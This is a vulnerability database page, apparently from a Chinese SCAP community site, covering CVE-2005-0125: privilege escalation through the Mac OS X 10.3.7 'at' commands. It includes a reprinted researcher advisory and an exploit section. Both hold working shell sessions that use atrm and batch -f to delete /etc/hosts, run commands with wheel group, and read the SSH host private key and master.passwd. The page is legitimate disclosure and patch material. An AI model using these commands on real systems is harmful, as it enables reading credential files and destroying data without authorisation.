CVE-2005-0125
CVSS7.2
发布时间 :2005-05-02 00:00:00
修订时间 :2016-10-17 23:07:57
NMCOPS    

[原文]The "at" commands on Mac OS X 10.3.7 and earlier do not properly drop privileges, which allows local users to (1) delete arbitrary files via atrm, (2) execute arbitrary programs via the -f argument to batch, or (3) read arbitrary files via the -f argument to batch, which generates a job file that is readable by the local user.


[CNNVD]Apple OSX多个应用程序安全漏洞(CNNVD-200505-512)

        Mac OS X是一款基于BSD的操作系统。
        Mac OS X包含的at相关的多个命令没有正确丢弃权限,本地攻击者可以利用这些漏洞删除文件,运行任意命令,读取敏感信息。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:apple:mac_os_x:10.3.7Apple Mac OS X 10.3.7
cpe:/o:apple:mac_os_x_server:10.3.7Apple Mac OS X Server 10.3.7
cpe:/o:apple:mac_os_x:10.3.4Apple Mac OS X 10.3.4

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0125
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0125
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-512
(官方数据源) CNNVD

- 其它链接及资源

http://lists.apple.com/archives/security-announce/2005/Jan/msg00001.html
(VENDOR_ADVISORY)  APPLE  APPLE-SA-2005-01-25
http://marc.info/?l=bugtraq&m=110685027017411&w=2
(UNKNOWN)  BUGTRAQ  20050127 DMA[2005-0127a] - 'Apple OSX batch family poor use of setuid'
http://www.digitalmunition.com/DMA%5B2005-0127a%5D.txt
(UNKNOWN)  MISC  http://www.digitalmunition.com/DMA[2005-0127a].txt
http://www.kb.cert.org/vuls/id/678150
(VENDOR_ADVISORY)  CERT-VN  VU#678150
http://xforce.iss.net/xforce/xfdb/18981
(VENDOR_ADVISORY)  XF  macos-at-gain-privileges(18981)

- 漏洞信息

Apple OSX多个应用程序安全漏洞
高危 访问验证错误
2005-05-02 00:00:00 2005-10-20 00:00:00
本地  
        Mac OS X是一款基于BSD的操作系统。
        Mac OS X包含的at相关的多个命令没有正确丢弃权限,本地攻击者可以利用这些漏洞删除文件,运行任意命令,读取敏感信息。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        http://www.apple.com/support/downloads/securityupdate2005001macosx1028client.html

- 漏洞信息 (F35929)

DMA-2005-0127a.txt (PacketStormID:F35929)
2005-01-28 00:00:00
Kevin Finisterre  
exploit
apple,osx
CVE-2005-0125
[点击下载]

Apple's OS X batch family of commands make poor use of setuid capabilities allowing for privilege escalation.

DMA[2005-0127a] - 'Apple OSX batch family poor use of setuid'
Author: Kevin Finisterre
Vendor: http://www.apple.com/macosx/
Product: * at commands <= Mac OS X v10.3.7, Mac OS X Server v10.3.7

References: (CAN-2005-0125)
http://www.digitalmunition.com/DMA[2005-0127a].txt
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0125
http://lists.apple.com/archives/security-announce/2005/Jan/msg00001.html
http://www.apple.com/support/downloads/securityupdate2005001macosx1028client.html
http://docs.info.apple.com/article.html?artnum=300770
http://www.immunitysec.com/downloads/nukido.pdf
http://www.immunitysec.com/downloads/nukido.sxw

Description: 
Mac OS X v10.3 Panther offers breakthroughs in innovation and ease of use that won't 
be seen in other operating systems for years, if ever, while its UNIX-based core 
provides rock-solid security on the Internet.

On 1/25/2005 Apple published an advisory for the "at" commands to address a local 
privilege escalation vulnerability. The "at" family of commands did not properly drop 
privileges. This could allow a local user to remove files not owned by them, run programs 
with added privileges, or read the contents of normally unreadable files. The update 
patched the commands at, atrm, batch, atq, and atrun. 

The following session outlines the behavior that was reported. 

Please note that at, batch, atq, atrm are all disabled by default on Mac OS X.  Each 
of these commands depend on the execution of atrun which has been disabled due to power 
management concerns.  Those who would like to use these commands, must first re-enable 
/usr/libexec/atrun by removing the leading '#' from the line
#*/5    *       *       *       *       root    /usr/libexec/atrun
in the file /etc/crontab.  

'atrm' can be used to delete any file on the system. The atrm vulnerability does not 
depend upon atrun. 

CrunkJuice:~ kevinfinisterre$ id
uid=501(kevinfinisterre) gid=501(kevinfinisterre) groups=501(kevinfinisterre), 
79(appserverusr), 80(admin), 81(appserveradm)

CrunkJuice:~ kevinfinisterre$ rm /etc/hosts
override rw-r--r--  root/wheel for /etc/hosts? y
rm: /etc/hosts: Permission denied

CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
-rw-r--r--  1 root  wheel  214  3 Dec 20:19 /etc/hosts

CrunkJuice:~ kevinfinisterre$ atrm /etc/hosts

CrunkJuice:~ kevinfinisterre$ ls -al /etc/hosts
ls: /etc/hosts: No such file or directory

'batch' can be used to execute commands as gid=0(wheel) groups=0(wheel), 1(daemon), 
2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) 

CrunkJuice:/tmp kevinfinisterre$ echo > aa
/usr/bin/id > /tmp/test

CrunkJuice:/tmp kevinfinisterre$ batch -f /tmp/aa 0
Job b0118490c.000 will be executed using /bin/sh

CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
cat: /tmp/test: No such file or directory

(wait 5 minutes)

CrunkJuice:/tmp kevinfinisterre$ cat /tmp/test
uid=501(kevinfinisterre) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys),
 4(tty), 5(operator), 20(staff), 31(guest), 80(admin)

'batch' can also be used to read any file on the system. 

CrunkJuice:~ kevinfinisterre$ cat /etc/ssh_host_dsa_key
cat: /etc/ssh_host_dsa_key: Permission denied

CrunkJuice:~ kevinfinisterre$ ls -al /etc/ssh_host_dsa_key
-rw-------  1 root  wheel  668 16 Nov 19:39 /etc/ssh_host_dsa_key

CrunkJuice:~ kevinfinisterre$ batch -f /etc/ssh_host_dsa_key
Job b011848db.000 will be executed using /bin/sh

CrunkJuice:~ kevinfinisterre$ ls -al /var/at/jobs/b011848db.000
-rwx------  1 kevinfin  wheel  1263  3 Dec 20:31 /var/at/jobs/b011848db.000

CrunkJuice:~ kevinfinisterre$ cat /var/at/jobs/b011848db.000
#! /bin/sh
# mail     root 0
umask 22
TERM_PROGRAM=Apple\_Terminal; export TERM_PROGRAM
SHELL=\/bin\/bash; export SHELL
TERM_PROGRAM_VERSION=100; export TERM_PROGRAM_VERSION
OLDPWD=\/var\/at\/jobs; export OLDPWD
USER=kevinfinisterre; export USER
__CF_USER_TEXT_ENCODING=0x1F5\:0\:0; export __CF_USER_TEXT_ENCODING
PATH=\/bin\:\/sbin\:\/usr\/bin\:\/usr\/sbin; export PATH
PWD=\/Users\/kevinfinisterre; export PWD
SHLVL=1; export SHLVL
HOME=\/Users\/kevinfinisterre; export HOME
LOGNAME=kevinfinisterre; export LOGNAME
SECURITYSESSIONID=20ee50; export SECURITYSESSIONID
cd /Users/kevinfinisterre
-----BEGIN DSA PRIVATE KEY-----
ascsefmwe;lijweio;fj23n8r01ur9wefskljvnsdlvsd;kvcms;dkmcv;sdklvm
dfbkldfmbdfp0bjerpgjwglvksdmvw430vgwevklmsdkvmasdvnqwefh3bnjnsek
6513515641w6egf4e65v4s6v54we65f4ae6f464b6464b6w4bw6e4bvgw6evgf4w
sdvsdfbgfgbndfdfvbsdfvsd5v46se8f4634f6w3f4q3f4sd35vf4sd3v4sd3v4s
ascsefmwe;lijweio;fj23n8r01ur9wefskljvnsdlvsd;kvcms;dkmcv;sdklvm
dfbkldfmbdfp0bjerpgjwglvksdmvw430vgwevklmsdkvmasdvnqwefh3bnjnsek
6513515641w6egf4e65v4s6v54we65f4ae6f464b6464b6w4bw6e4bvgw6evgf4w
sdvsdfbgfgbndfdfvbsdfvsd5v46se8f4634f6w3f4q3f4sd35vf4sd3v4sd3v4s
ereethamstahenkryption
-----END DSA PRIVATE KEY-----

Apple has released patches for this vulnerability, please see the 
references above. 

For the protection of its customers, Apple does not disclose, discuss,
or confirm security issues until a full investigation has occurred and
any necessary patches or releases are available. Apple likes to focus 
response efforts so that they have the greatest impact across
the product line, because of this they generally will not respond to 
e-mail messages unless further information is needed for a security 
issue.

This is timeline associated with this bug. 

12/20/2004 02:22 PM - initial response
01/03/2005 09:17 PM - followup
01/12/2005 02:56 PM - ...
01/13/2005 08:41 PM - ...
01/19/2005 12:16 AM - confirm credit
01/20/2005 12:13 PM - immunitysec nukido release

-KF


    

- 漏洞信息

13180
Apple Mac OS X at Package batch Command Privilege Escalation
Local Access Required Authentication Management
Loss of Integrity
Exploit Public

- 漏洞描述

Mac OS X contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when the batch command fail to drop root privileges, and run user-specified commands as root. By passing the -f argument to the command, a malicious user could execute and/or read arbitrary files resulting in a loss of integrity.

- 时间线

2005-01-25 2004-12-20
2005-01-25 Unknow

- 解决方案

Upgrade to version 10.3.8 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Apple Mac OS X At Utility Family Multiple Local Privilege Escalation Vulnerabilities
Access Validation Error 12297
No Yes
2005-01-18 12:00:00 2009-07-12 10:06:00
Discovery of this issue is credited to Immunity Inc. Discovery of the 'batch' command issue is credited to KF <kf_lists@digitalmunition.com>.

- 受影响的程序版本

Apple Mac OS X Server 10.3.7
Apple Mac OS X Server 10.3.6
Apple Mac OS X Server 10.3.5
Apple Mac OS X Server 10.3.4
Apple Mac OS X Server 10.3.3
Apple Mac OS X Server 10.3.2
Apple Mac OS X Server 10.3.1
Apple Mac OS X Server 10.3
Apple Mac OS X 10.3.7
Apple Mac OS X 10.3.6
Apple Mac OS X 10.3.5
Apple Mac OS X 10.3.4
Apple Mac OS X 10.3.3
Apple Mac OS X 10.3.2
Apple Mac OS X 10.3.1
Apple Mac OS X 10.3
Apple Mac OS X Server 10.3.8
Apple Mac OS X 10.3.8

- 不受影响的程序版本

Apple Mac OS X Server 10.3.8
Apple Mac OS X 10.3.8

- 漏洞讨论

Multiple privilege escalation issues affect the 'at' family of utilities on Apple Mac OS X. These issues are due to a failure of the application to properly implement access controls on job schedule files.

An attacker may leverage these issues to read and delete arbitrary files and execute applications on an affected computer with superuser privileges. Information revealed in this way may lead to further attacks.

- 漏洞利用

No exploit is required to leverage these issues. The following proof of concept has been provided to view the master.passwd file:

tcsh% at ­-f /etc/master.passwd 12:44
Job a01194a36.001 will be executed using /bin/sh
tcsh% cat /var/at/jobs/a01194a36.001
tcsh% atrm a01194a36.001

The following proof of concept has been provided to remove arbitrary files from the affected computer:

tcsh% atrm fileName

Finally the following sequence will allow for the execution of the 'id' command with escalated privileges:

tcsh% echo &gt; aa
/usr/bin/id &gt; /tmp/test
tcsh% batch -f /tmp/aa 0
Job b0118490c.000 will be executed using /bin/sh
tcsh% cat /tmp/test
cat: /tmp/test: No such file or directory
(wait for the scheduled job to run)
tcsh% cat /tmp/test
uid=500(username) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest), 80(admin)

- 解决方案

Apple Computers has released advisory APPLE-SA-2005-01-25 along with a security update dealing with this and other issues. Please see the referenced advisory for more information.

Apple Computers has released Mac OS X version 10.3.8 dealing with this issue. This upgrade includes the security patches shipped with the referenced security update.


Apple Mac OS X Server 10.3.7

Apple Mac OS X 10.3.7

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站